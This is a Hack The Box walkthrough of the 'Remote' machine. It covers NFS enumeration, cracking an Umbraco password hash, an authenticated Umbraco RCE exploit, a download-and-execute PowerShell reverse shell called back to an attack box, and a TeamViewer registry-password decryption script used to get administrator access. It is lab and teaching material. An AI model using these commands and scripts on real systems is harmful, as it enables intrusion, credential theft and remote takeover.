REMOTE HTB WRITE UP | WALKTHROUGH
Remote is a good HTB machine to learn about the danger of public sharing of files on a network and use of not upgrade software. Inside this article, I will show you methods I use to pwned this machine.
RECONNAISSANCE
Before start, we have to know some information about the VICTIM machine and one of the best way to do it is a nmap scan
nmap -sC -sV -O TARGET_IP
There is the output of scan
Many ports are open, firstly we can mark the port 21 that allows anonymous login and the port 80 that mean there is a website open on the target machine
FTP ANONYMOUS LOGIN
Anonymous login mean that we can log into the ftp server by using the anonymous username without password.
Now connected, use “ls” to list all files available on the server
Nothing, what a deception 😓. But don’t give up and try another thing
MOUNTD SHARED FILES
Look at the last open port, the 2049 port running the mountd service, meaning that there is shared files by the TARGET machine, and we can mount it in our local machine.
Firstly, we use the following command
showmount -e TARGET_IP
Showmount help used to list all the directory shared by the victim that everyone in the network can mount in this local machine.
As you seen in the previous output, there is a /site_backups folder we can mount with the following command
sudo mount -t nfs TARGET_IP:/site_backups victim
The shared folder will be mount inside the victim folder I created.
It looks to be a folder for the CMS use by the site hosted in the target computer (remind port 80) is open.
I have done little research on the internet and found that the Umbraco CMS store credentials in a file name Umbrco.sdf inside the App_Data directory.
Open it with any editor you want(I use nano).
We can see (underlined) username hash of password and hash algorithm used. We will use john the ripper to decrypt the password with this command
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash.txt
hash.txt is the file inside which I paste the hash of password. After this, you can use the following command to show password cracked
john --show hash.txt
Now we have credentials, we have to find a way to access admin panel via this link http://TARGET_IP/umbraco
Once connected, we can go to help panel to see Umbraco version
We use searchploit command to find vulnerability existed for this version
Exploit can be use like this
python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u username -p password -i 'http://TARGET_IP' -c 'command'
As you seen with the screenshot below, we can use it we information we gather to execute whoami command
The next step is to use this vulnerability to get access
Windows reverse shell
Usually, to do a reverse shell between two machines, we use netcat utility that is not installed by default on Windows. So we will use a PowerShell script that connect back Windows shell to our attack box.
So we downloaded it first in our attack box with wget command
wget https://github.com/martinsohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1
Update the script with attack box IP address and the port that will be use in netcat listener
Open a simple HTTP server, we will download the script on victim machine from the attack box
Run a netcat listener because the command will download the powershell script and execute it once :
nc -lvnp PORT
The following command download and execute the powershell script that connect back to our netcat listener.
python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u admin@htb.local -p baconandcheese -i 'http://TARGET_IP' -c powershell.exe -a 'IEX(IWR http://ATTACK_BOX_IP:8000/powershell-reverse-shell.ps1 -UseBasicParsing); powershell-reverse-shell ATTACK_BOX_IP PORT'
Come back to our netcat listener and we are connected
Once connected you can easily get the flag
Privilege escalation
We are connected as a simple user, but we can use our access to get more privileges.
Take the at the files insides the C:\Users\Public\Desktop
There is a link to the software TeamViewer version 7. To verify that, we check at a non default running service that is launch by TeamViewer with this command
tasklist /svc
As you seen in the output, TeamViewer7 is running
I just search for “TeamViewer vulnerability”. And I found this : https://www.cvedetails.com/cve/CVE-2019-18988/. The previous vulnerability can be used to decrypt password and get password in the login system like administrator password.
A little brief about the vulnerability : The version of TeamViewer from 7 to 14.8 store password in a registry key encrypted with AES, but all the software have a same key. If you have a key, you can easily decrypt an admin password on a local machine.
Manual exploit
Once connect, we can print the value of registry Key with this command
reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7
As you seen in output, the password to acces remotely to machine encrypted with AES
We will use this little python code from this site : https://web.archive.org/web/20200203175441/https://whynotsecurity.com/blog/teamviewer/, to decrypt the password.
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "PASTE THE CIPHER PASSWORD HERE" # output from the registry
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
print(hexdump.hexdump(raw_un))
password = raw_un.decode('utf-16')
print(password)
Don’t forget to replace the cipher password in the code with the good one.
Then execute the python code and you have the password in clear
Now connect through the psexec utility
psexec.py Administrator@TARGET_IP
And we can easily get the flag